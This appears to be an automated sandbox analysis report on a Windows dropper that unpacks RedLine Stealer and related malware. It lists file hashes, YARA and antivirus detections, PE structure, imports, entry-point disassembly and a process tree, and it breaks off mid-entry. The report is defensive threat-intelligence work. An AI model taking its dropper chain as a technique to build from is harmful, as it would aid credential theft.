                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):179200
                                              Entropy (8bit):4.95425936878501
                                              Encrypted:false
                                              SSDEEP:3072:VxqZWjfa8oty3QqECU8eUcFShTnxNn2pU9f2MKTV/wi4lr55R9TxlnsPsUw0jOuu:fqZCQqElPSh
                                              MD5:3389637C0D072121BF1B127629736D37
                                              SHA1:300E915EFDF2479BFD0D3699C0A6BC51260F9655
                                              SHA-256:2B74C4CE2674A8FC0C78FFFA39C5DE5E43AE28B8BF425349A5F97C6A61135153
                                              SHA-512:A32CC060D2600F6CA94FFDCE07C95EA5E2F56C0B418260456B568CB41E5F55DB0C4FC97C35CA4103C674E61A17300D834D2C0DA5A78B7084B6BC342FD23A7FB4
                                              Malicious:true
                                              Yara Hits:
                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\qs5212ER.exe, Author: Joe Security
                                              • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\qs5212ER.exe, Author: ditekSHen
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 73%
                                              • Antivirus: Virustotal, Detection: 76%, Browse
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.................. ........@.. ....................... ............@.................................8...O.......,............................................................................ ............... ..H............text....... ...................... ..`.rsrc...,...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exe
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):724480
                                              Entropy (8bit):7.877478908934754
                                              Encrypted:false
                                              SSDEEP:12288:nMrLy90XhUZyfdU+LeVcCK0O+Wxow//9K4IBrOh+KCRDsam9F97I:YyXZyKdcJ0VWeoqSCqjt7I
                                              MD5:7543D15869BB6AF00305F1C7BA4F6B49
                                              SHA1:CFC7F936A31F5B9FB124230EC3CC9A5A0A64099E
                                              SHA-256:5F27709F089A646DABE6FEF0B51CC808E785C4DE385B30231B00CCF146ABCB7B
                                              SHA-512:099A9B3ABFC8CAC05BF0655735EC87D5F7D226E84320A6910ED1A30FE695EA8F09837D56F8F95E91092E9E4AA6BA6C9772544BD510D0A7147D087E5A21C0261C
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 64%
                                              • Antivirus: Virustotal, Detection: 55%, Browse
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K..K..K...N..K...H..K...O..K...J..K..J...K...C..K.....K...I..K.Rich..K.........PE..L....`.b.................d..........`j............@..........................`............@...... ...........................................................P..........T...............................@............................................text....c.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc................|..............@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exe
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):400896
                                              Entropy (8bit):6.799077893289741
                                              Encrypted:false
                                              SSDEEP:6144:OpBL6vPRiUryaNB5HC6XkN9UomaZ4RPDNr:OpBGvPIUOaThCpDTQr
                                              MD5:046BA85B86059ACD742BE1DE5448233B
                                              SHA1:073531374021E722203FE0766794F417FA9B51AF
                                              SHA-256:F8E7A702DBE3BFA707D53049267F7AE41DDAF22ABBA381892F8303151D9B2BEE
                                              SHA-512:2F8BFBDE57935AD3AD8801E3568CACA11DA0FE6582D70BB1FBBFE517A2E0326B485119A92E6872D52A8B77C38031090F13AEB4F2599D781B15C3B19B4A5471AE
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 46%
                                              • Antivirus: Virustotal, Detection: 51%, Browse
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@......P...P...P..(P/..P..9P...P../Pm..P#z.P...P...Py..P..&P...P..8P...P..=P...PRich...P................PE..L.....b......................m......P............@.......................... q.................................................d.....n.......................p.....................................x-..@............................................text............................... ..`.data...H.j......&..................@....rsrc.........n.....................@..@.reloc..x.....p.....................@..B........................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exe
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):362496
                                              Entropy (8bit):7.661331846748842
                                              Encrypted:false
                                              SSDEEP:6144:Koy+bnr+fp0yN90QEwmwkVq0x142x9Q4lJEyl0Cr4x+WeQYLwzT/XNmz:QMrTy90Fzv4ACK0R+WLow//dG
                                              MD5:941C83F4C8AD9D1112BFC556CFA74167
                                              SHA1:33562464DA86FEE0C267ABF350A13720D4F3E676
                                              SHA-256:982488AC3B18055B19392EA1D59A2D83F508EFD6B0A9F14F67D15ABDCCE22368
                                              SHA-512:57DFFA208E760EAFE0C684B105E05A6669F0757CDA38D24E127D0ECCE04DC63DE4B66A393A1BB48916C560D4C8E7C7C01CD334E1CD2C637763C1F2002BC9B024
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 64%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K..K..K...N..K...H..K...O..K...J..K..J...K...C..K.....K...I..K.Rich..K.........PE..L....`.b.................d... ......`j............@.................................G.....@...... ......................................................................T...............................@............................................text....c.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc................|..............@..@.reloc...............~..............@..B........................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):11264
                                              Entropy (8bit):4.97029807367379
                                              Encrypted:false
                                              SSDEEP:96:yA/vMth9sDLibql3A44P9QL4fwmPImg+A03PvXLOzk+gqWYV4J6oP/zNt:yw+wGWt94+iANiCkc4Jhp
                                              MD5:7E93BACBBC33E6652E147E7FE07572A0
                                              SHA1:421A7167DA01C8DA4DC4D5234CA3DD84E319E762
                                              SHA-256:850CD190AAEEBCF1505674D97F51756F325E650320EAF76785D954223A9BEE38
                                              SHA-512:250169D7B6FCEBFF400BE89EDAE8340F14130CED70C340BA9DA9F225F62B52B35F6645BFB510962EFB866F988688CB42392561D3E6B72194BC89D310EA43AA91
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 88%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.."...........@... ...`....@.. ....................................@..................................@..O....`...............................@..8............................................ ............... ..H............text.... ... ...".................. ..`.rsrc........`.......$..............@..@.reloc...............*..............@..B.................@......H.......T$...............................................................0...........@s.....@...(....&*..0..K......... ?...(......~....(....,.*r...p.....(....%..(....& ....(....(....&.(....&*..0..e.......(....~........+G.....o....r#..p(....,-.o.... ......(....-.*.(....&(.....o....(....&..X....i2..(....&*....0..`.......(....~........+B.....o....r...p(....,(.o.... ......(....-.*.(....&.o....(....&..X....i2..(....&*.0..c......... ?...(......~....(....,.*....(............%...(...
                                              Process:C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exe
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):341504
                                              Entropy (8bit):6.481868598519912
                                              Encrypted:false
                                              SSDEEP:6144:nZ3LYwHUxsB2a9D4lJERA0Cr4x+WBQYLwzAW0nr:nZ38wHU2BsCi0R+Weowar
                                              MD5:79CBBF32E2376C4CADB2DFAD0ED320FA
                                              SHA1:6BA6E52F1E7C73FFC92864B9B63710934D4C9E00
                                              SHA-256:6DFB051F61149894BE7702ACF73AD1592C997C9362AC6DA1DA6526A0E2E77AEE
                                              SHA-512:120409D7D975BF694C001F97C577D7AAE41341F78268DAFF26622F4ABF93F8DF831141B7DDD99713C7F302503FD1A009BB37464845EA0432CCC2C79F4DEE3DC2
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 46%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@......P...P...P..(P/..P..9P...P../Pm..P#z.P...P...Py..P..&P...P..8P...P..=P...PRich...P................PE..L......a......................m......P............@..........................0p.....g5..........................................d.....n.......................o.....................................x-..@............................................text............................... ..`.data...H.j......&..................@....rsrc.........n.....................@..@.reloc..x.....o.....................@..B........................................................................................................................................................................................................................................................................................................................................................................
                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Entropy (8bit):7.930307188666943
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:plEnknXWQD.exe
                                              File size:1063936
                                              MD5:548ee02a30c2dcca5f3f91e90212ec29
                                              SHA1:cff21359a3498e3f3e8def5c553a626363b49922
                                              SHA256:3b6171920a1c00a384ac77f88d94b78d960bd317efc531748893edcd579e370e
                                              SHA512:4f7be3d30ebd73bdd88a07601edfa7e83198338625f1769fba3ce764d6517662f64189830f56d1711590293f5acf89ab238027f2c4997aba546f19523e3e747a
                                              SSDEEP:24576:WyapzRm+tB1T6qkoY0/WavTQmaHHT7o2cKC:lapFfT1OVt8lvTQZTRcK
                                              TLSH:7C352317ABF98432EC75933008F712C30A36BD906678535B639F9C1B08B1A69A636777
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K...K...K...N...K...H...K...O...K...J...K...J...K...C...K.......K...I...K.Rich..K.........PE..L....`.b.................d.
                                              Icon Hash:f8e0e4e8ecccc870
                                              Entrypoint:0x406a60
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x628D60E2 [Tue May 24 22:49:06 2022 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:10
                                              OS Version Minor:0
                                              File Version Major:10
                                              File Version Minor:0
                                              Subsystem Version Major:10
                                              Subsystem Version Minor:0
                                              Import Hash:646167cce332c1c252cdcb1839e0cf48
                                              Instruction
                                              call 00007F63D9401F05h
                                              jmp 00007F63D9401815h
                                              push 00000058h
                                              push 004072B8h
                                              call 00007F63D9401FA7h
                                              xor ebx, ebx
                                              mov dword ptr [ebp-20h], ebx
                                              lea eax, dword ptr [ebp-68h]
                                              push eax
                                              call dword ptr [0040A184h]
                                              mov dword ptr [ebp-04h], ebx
                                              mov eax, dword ptr fs:[00000018h]
                                              mov esi, dword ptr [eax+04h]
                                              mov edi, ebx
                                              mov edx, 004088ACh
                                              mov ecx, esi
                                              xor eax, eax
                                              lock cmpxchg dword ptr [edx], ecx
                                              test eax, eax
                                              je 00007F63D940182Ah
                                              cmp eax, esi
                                              jne 00007F63D9401819h
                                              xor esi, esi
                                              inc esi
                                              mov edi, esi
                                              jmp 00007F63D9401822h
                                              push 000003E8h
                                              call dword ptr [0040A188h]
                                              jmp 00007F63D94017E9h
                                              xor esi, esi
                                              inc esi
                                              cmp dword ptr [004088B0h], esi
                                              jne 00007F63D940181Ch
                                              push 0000001Fh
                                              call 00007F63D9401D3Bh
                                              pop ecx
                                              jmp 00007F63D940184Ch
                                              cmp dword ptr [004088B0h], ebx
                                              jne 00007F63D940183Eh
                                              mov dword ptr [004088B0h], esi
                                              push 004010C4h
                                              push 004010B8h
                                              call 00007F63D9401966h
                                              pop ecx
                                              pop ecx
                                              test eax, eax
                                              je 00007F63D9401829h
                                              mov dword ptr [ebp-04h], FFFFFFFEh
                                              mov eax, 000000FFh
                                              jmp 00007F63D9401949h
                                              mov dword ptr [004081E4h], esi
                                              cmp dword ptr [004088B0h], esi
                                              jne 00007F63D940182Dh
                                              push 004010B4h
                                              push 004010ACh
                                              call 00007F63D9401EF5h
                                              pop ecx
                                              pop ecx
                                              mov dword ptr [000088B0h], 00000000h
                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xa28c0xb4.idata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000xfb40c.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x1080000x888.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x14100x54.text
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x10080x40.text
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0xa0000x288.idata
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x63140x6400False0.5744140625data6.314163792045976IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .data0x80000x1a480x200False0.609375data4.970639543960129IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .idata0xa0000x10520x1200False0.4140625data5.025949912909207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .rsrc0xc0000xfc0000xfb600False0.9629314162729985data7.949387418142808IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0x1080000x8880xa00False0.746484375data6.222637930812128IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                              NameRVASizeTypeLanguageCountry
                                              AVI0xcb300x2e1aRIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bppEnglishUnited States
                                              RT_ICON0xf94c0x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States
                                              RT_ICON0xffb40x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States
                                              RT_ICON0x1029c0x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288EnglishUnited States
                                              RT_ICON0x104840x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States
                                              RT_ICON0x105ac0xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States
                                              RT_ICON0x114540x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States
                                              RT_ICON0x11cfc0x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States
                                              RT_ICON0x123c40x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States
                                              RT_ICON0x1292c0xd9d2PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                              RT_ICON0x203000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States
                                              RT_ICON0x228a80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States
                                              RT_ICON0x239500x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States
                                              RT_ICON0x242d80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States
                                              RT_DIALOG0x247400x2f2dataEnglishUnited States
                                              RT_DIALOG0x24a340x35cdataRussianRussia
                                              RT_DIALOG0x24d900x1b0dataEnglishUnited States
                                              RT_DIALOG0x24f400x1b4dataRussianRussia
                                              RT_DIALOG0x250f40x166dataEnglishUnited States
                                              RT_DIALOG0x2525c0x168dataRussianRussia
                                              RT_DIALOG0x253c40x1c0dataEnglishUnited States
                                              RT_DIALOG0x255840x1e0dataRussianRussia
                                              RT_DIALOG0x257640x130dataEnglishUnited States
                                              RT_DIALOG0x258940x150dataRussianRussia
                                              RT_DIALOG0x259e40x120dataEnglishUnited States
                                              RT_DIALOG0x25b040x122dataRussianRussia
                                              RT_STRING0x25c280x8cMatlab v4 mat-file (little endian) l, numeric, rows 0, columns 0EnglishUnited States
                                              RT_STRING0x25cb40x86Matlab v4 mat-file (little endian) K\0041\0045\004@\0048\004B\0045\004 , numeric, rows 0, columns 0RussianRussia
                                              RT_STRING0x25d3c0x520dataEnglishUnited States
                                              RT_STRING0x2625c0x52edataRussianRussia
                                              RT_STRING0x2678c0x5ccdataEnglishUnited States
                                              RT_STRING0x26d580x592dataRussianRussia
                                              RT_STRING0x272ec0x4b0dataEnglishUnited States
                                              RT_STRING0x2779c0x4b2dataRussianRussia
                                              RT_STRING0x27c500x44adataEnglishUnited States
                                              RT_STRING0x2809c0x43edataRussianRussia
                                              RT_STRING0x284dc0x3cedataEnglishUnited States
                                              RT_STRING0x288ac0x2fcdataRussianRussia
                                              RT_RCDATA0x28ba80x7ASCII text, with no line terminatorsEnglishUnited States
                                              RT_RCDATA0x28bb00xdd726Microsoft Cabinet archive data, many, 907046 bytes, 2 files, at 0x2c +A "will6283.exe" +A "ry40VI69.exe", ID 1992, number 1, 34 datablocks, 0x1503 compressionEnglishUnited States
                                              RT_RCDATA0x1062d80x4dataEnglishUnited States
                                              RT_RCDATA0x1062dc0x24dataEnglishUnited States
                                              RT_RCDATA0x1063000x7ASCII text, with no line terminatorsEnglishUnited States
                                              RT_RCDATA0x1063080x7ASCII text, with no line terminatorsEnglishUnited States
                                              RT_RCDATA0x1063100x4dataEnglishUnited States
                                              RT_RCDATA0x1063140xdASCII text, with no line terminatorsEnglishUnited States
                                              RT_RCDATA0x1063240x4dataEnglishUnited States
                                              RT_RCDATA0x1063280xdASCII text, with no line terminatorsEnglishUnited States
                                              RT_RCDATA0x1063380x4dataEnglishUnited States
                                              RT_RCDATA0x10633c0x5ASCII text, with no line terminatorsEnglishUnited States
                                              RT_RCDATA0x1063440x7ASCII text, with no line terminatorsEnglishUnited States
                                              RT_RCDATA0x10634c0x7ASCII text, with no line terminatorsEnglishUnited States
                                              RT_GROUP_ICON0x1063540xbcdataEnglishUnited States
                                              RT_VERSION0x1064100x408dataEnglishUnited States
                                              RT_VERSION0x1068180x410dataRussianRussia
                                              RT_MANIFEST0x106c280x7e2XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States
                                              DLLImport
                                              ADVAPI32.dllGetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
                                              KERNEL32.dll_lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, lstrcmpA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, ExpandEnvironmentStringsA, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, FindNextFileA, LocalAlloc, GetShortPathNameA, MulDiv, GetDiskFreeSpaceA, EnumResourceLanguagesA, GetTickCount, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetStartupInfoW, Sleep, FindClose, GetCurrentProcess, FindFirstFileA, WaitForSingleObject, GetModuleFileNameA, LoadLibraryExA
                                              GDI32.dllGetDeviceCaps
                                              USER32.dllSetWindowLongA, GetDlgItemTextA, DialogBoxIndirectParamA, ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetDesktopWindow, CharUpperA, SetDlgItemTextA, ExitWindowsEx, MessageBeep, EndDialog, CharPrevA, LoadStringA, CharNextA, EnableWindow, ReleaseDC, SetForegroundWindow, PeekMessageA, GetDlgItem, SendMessageA, SendDlgItemMessageA, MessageBoxA, SetWindowTextA, GetWindowLongA, CallWindowProcA, GetSystemMetrics
                                              msvcrt.dll_controlfp, ?terminate@@YAXXZ, _acmdln, _initterm, __setusermatherr, _except_handler4_common, memcpy, _ismbblead, __p__fmode, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, __p__commode, _XcptFilter, memcpy_s, _vsnprintf, memset
                                              COMCTL32.dll
                                              Cabinet.dll
                                              VERSION.dllGetFileVersionInfoA, VerQueryValueA, GetFileVersionInfoSizeA
                                              Language of compilation systemCountry where language is spokenMap
                                              EnglishUnited States
                                              RussianRussia
                                              Report size exceeds maximum size, go to the download page of this report and download PCAP to see all network behavior.

                                              Click to jump to process

                                              Click to jump to process

                                              Click to dive into process behavior distribution

                                              Click to jump to process

                                              Target ID:0
                                              Start time:21:02:50
                                              Start date:18/03/2023
                                              Path:C:\Users\user\Desktop\plEnknXWQD.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\Desktop\plEnknXWQD.exe
                                              Imagebase:0x380000
                                              File size:1063936 bytes
                                              MD5 hash:548EE02A30C2DCCA5F3F91E90212EC29
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.307182274.0000000004904000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low

                                              Target ID:1
                                              Start time:21:02:50
                                              Start date:18/03/2023
                                              Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exe
                                              Imagebase:0x1060000
                                              File size:872960 bytes
                                              MD5 hash:52B9E7C5A314A3E0BD0AF989586DE77B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000003.308015550.0000000004D3E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 70%, ReversingLabs
                                              • Detection: 55%, Virustotal, Browse
                                              Reputation:low

                                              Target ID:2
                                              Start time:21:02:50
                                              Start date:18/03/2023
                                              Path:C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exe
                                              Imagebase:0xac0000
                                              File size:724480 bytes
                                              MD5 hash:7543D15869BB6AF00305F1C7BA4F6B49
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Antivirus matches:
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 64%, ReversingLabs
                                              • Detection: 55%, Virustotal, Browse
                                              Reputation:low

                                              Target ID:3
                                              Start time:21:02:51
                                              Start date:18/03/2023
                                              Path:C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exe
                                              Imagebase:0x2f0000
                                              File size:362496 bytes
                                              MD5 hash:941C83F4C8AD9D1112BFC556CFA74167
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Antivirus matches:
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 64%, ReversingLabs
                                              Reputation:low

                                              Target ID:4
                                              Start time:21:02:51
                                              Start date:18/03/2023
                                              Path:C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exe
                                              Imagebase:0xe00000
                                              File size:11264 bytes
                                              MD5 hash:7E93BACBBC33E6652E147E7FE07572A0
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Antivirus matches:
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 88%, ReversingLabs
                                              Reputation:high

                                              Target ID:5
                                              Start time:21:03:02
                                              Start date:18/03/2023
                                              Path:C:\Windows\System32\rundll32.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                              Imagebase:0x7ff7c6ff0000
                                              File size:69632 bytes
                                              MD5 hash:73C519F050C20580F8A62C849D49215A
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Target ID:6
                                              Start time:21:03:03
                                              Start date:18/03/2023
                                              Path:C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe
                                              Imagebase:0x400000
                                              File size:341504 bytes
                                              MD5 hash:79CBBF32E2376C4CADB2DFAD0ED320FA
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000002.368689660.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                              • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000006.00000002.368689660.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Author: ditekSHen
                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.369287641.0000000002E16000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000002.368971043.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000006.00000002.368971043.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000003.336833965.0000000002C20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000006.00000003.336833965.0000000002C20000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                              Antivirus matches:
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 46%, ReversingLabs
                                              Reputation:low

                                              Target ID:7
                                              Start time:21:03:11
                                              Start date:18/03/2023
                                              Path:C:\Windows\System32\rundll32.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                              Imagebase:0x7ff7c6ff0000
                                              File size:69632 bytes
                                              MD5 hash:73C519F050C20580F8A62C849D49215A
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Target ID:8
                                              Start time:21:03:19
                                              Start date:18/03/2023
                                              Path:C:\Windows\System32\rundll32.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                              Imagebase:0x7ff7c6ff0000
                                              File size:69632 bytes
